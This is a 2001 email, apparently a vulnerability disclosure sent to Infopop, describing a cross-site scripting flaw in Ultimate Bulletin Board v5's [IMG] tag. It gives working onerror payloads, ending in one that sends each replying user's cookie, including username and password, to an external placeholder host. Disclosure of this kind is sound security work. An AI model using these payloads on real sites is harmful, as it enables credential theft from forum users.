Date: Wed, 21 Feb 2001 14:19:16 -0800
From: Scott Ashman <[email protected]>
To: [email protected]Subject: Ultimate Bulletin Board
This is a multi-part message in MIME format.
------=_NextPart_000_005E_01C09C11.4589A6C0
Content-Type: text/plain;
charset="Windows-1252"
Content-Transfer-Encoding: quoted-printable
Here is a message I just popped off to infopop about their Ultimate =
Bulletin Board v5 product. It's not really meant for someone not used =
to their product.
-------------------------------------------------------------------------=
-------
If a user has info stored in a cookie, replies to a message and is using =
IE 4.0+ there is a way for a hacker to trap his IP / user name / =
password / other cookie information and send them to an external source =
using your UBB code with HTML *off*. There is a way to do this by =
simply viewing a message as well, although it's obvious something is =
going on as it involves a redirection. Here's how it works :
Apparently the [img][/img] tag allows non-spaced javascript to run. You =
can
write a line like this :
[IMG]test"onerror=3D"alert('test');[/IMG]
This will run the javascript alert when the image 'test' fails to load.
Your cookies can hold both the username and password but is only =
accessable on
the
http://sitename/cgi-bin/ path. Script running on anything in cgi-path
(replies) can access it. So
[IMG]test"onerror=3D"alert(document.cookie);[/IMG] will pop up an alert =
box
with the cookie info on a "reply" page as it's displayed in the thread =
review
at the bottom.
You can reassign the src of your image (this.src) with document.cookie =
tacked on
to point to an external page. The weird thing about imgs and http =
requests
in general is that your destination does not have to be an image. So <a
src=3D"www.excite.com/index.html"> will actually try to access =
index.html.
Hence, you can add actual passable information to an external cgi or =
whatever. On the external page all you need to do is either watch the =
logs or have the page itself
log any URL variables along with IPs coming in from the request.
The final line should read something like :
[IMG]test"onerror=3D"this.src=3D'http://xxx.xxx.com/page.cfm?'+escape(doc=
ument.cookie);
[/IMG]
(Pasting this line [no spaces/crlf] in an mesage means that any user =
replying to anything in that thread will cause their cookie to be sent =
to an external source)
Scott Ashman
Jaspin Interactive www.jaspin.com
------=_NextPart_000_005E_01C09C11.4589A6C0
Content-Type: text/html;
charset="Windows-1252"
Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; =
charset=3Dwindows-1252">
<META content=3D"MSHTML 5.50.4134.600" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT size=3D2>Here is a message I just popped off to infopop about =
their=20
Ultimate Bulletin Board v5 product. It's not really meant for =
someone not=20
used to their product.</FONT></DIV>
<DIV><FONT size=3D2></FONT> </DIV>
<DIV>
<HR>
</DIV>
<DIV><FONT size=3D2></FONT> </DIV>
<DIV>
<DIV><FONT size=3D2><FONT size=3D3>If a user has info stored in a =
cookie, replies to=20
a message and is using IE 4.0+ there is a way for a hacker to trap =
his IP=20
/ user name / password / other cookie information and send them to =
an=20
external source using your UBB code with HTML *off*. There is a =
way to do=20
this by simply viewing a message as well, although it's obvious =
something is=20
going on as it involves a redirection. Here's how it works=20
:<BR><BR>Apparently the [img][/img] tag allows non-spaced javascript to=20
run. You can<BR>write a line like this=20
:<BR><BR>[IMG]test"onerror=3D"alert('test');[/IMG]<BR><BR>This will run =
the=20
javascript alert when the image 'test' fails to load.<BR><BR>Your=20
cookies can hold both the username and password but is only =
accessable=20
on<BR>the<BR></FONT><A href=3D"http://sitename/cgi-bin/"><FONT=20
size=3D3>http://sitename/cgi-bin/<;/FONT></A><FONT size=3D3> path. =
Script=20
running on anything in cgi-path<BR>(replies) can access it. =20
So<BR>[IMG]test"onerror=3D"alert(document.cookie);[/IMG] will pop up an =
alert=20
box<BR>with the cookie info on a "reply" page as it's displayed in the =
thread=20
review<BR>at the bottom.<BR><BR>You can reassign the src of your image=20
(this.src) with document.cookie tacked on<BR>to point to an external =
page. =20
The weird thing about imgs and http requests<BR>in general is that your=20
destination does not have to be an image. So =
<a<BR>src=3D"</FONT><A=20
href=3D"http://www.excite.com/index.html"><FONT=20
size=3D3>www.excite.com/index.html</FONT></A><FONT size=3D3>"> will =
actually try=20
to access index.html.<BR>Hence, you can add actual passable information =
to an=20
external cgi or whatever. On the external page all you need =
to do is=20
either watch the logs or have the page itself<BR>log any URL variables =
along=20
with IPs coming in from the request.<BR><BR>The final line should read =
something=20
like=20
:<BR>[IMG]test"onerror=3D"this.src=3D'http://xxx.xxx.com/page.cfm?'+escap=
e(document.cookie);<BR>[/IMG]<BR><BR>(Pasting=20
this line [no spaces/crlf] in an mesage means that any=20
user replying to anything in that thread will cause their cookie to =
be sent=20
to an external source)</FONT></FONT></DIV>
<DIV><FONT size=3D2><FONT size=3D2></FONT></FONT> </DIV>
<DIV><FONT size=3D2><FONT size=3D3>Scott Ashman</FONT></FONT></DIV>
<DIV><FONT size=3D2><FONT size=3D3>Jaspin Interactive <A=20
href=3D"http://www.jaspin.com">www.jaspin.com</A></FONT></DIV>
<DIV><BR></DIV></FONT></DIV></BODY></HTML>
------=_NextPart_000_005E_01C09C11.4589A6C0--
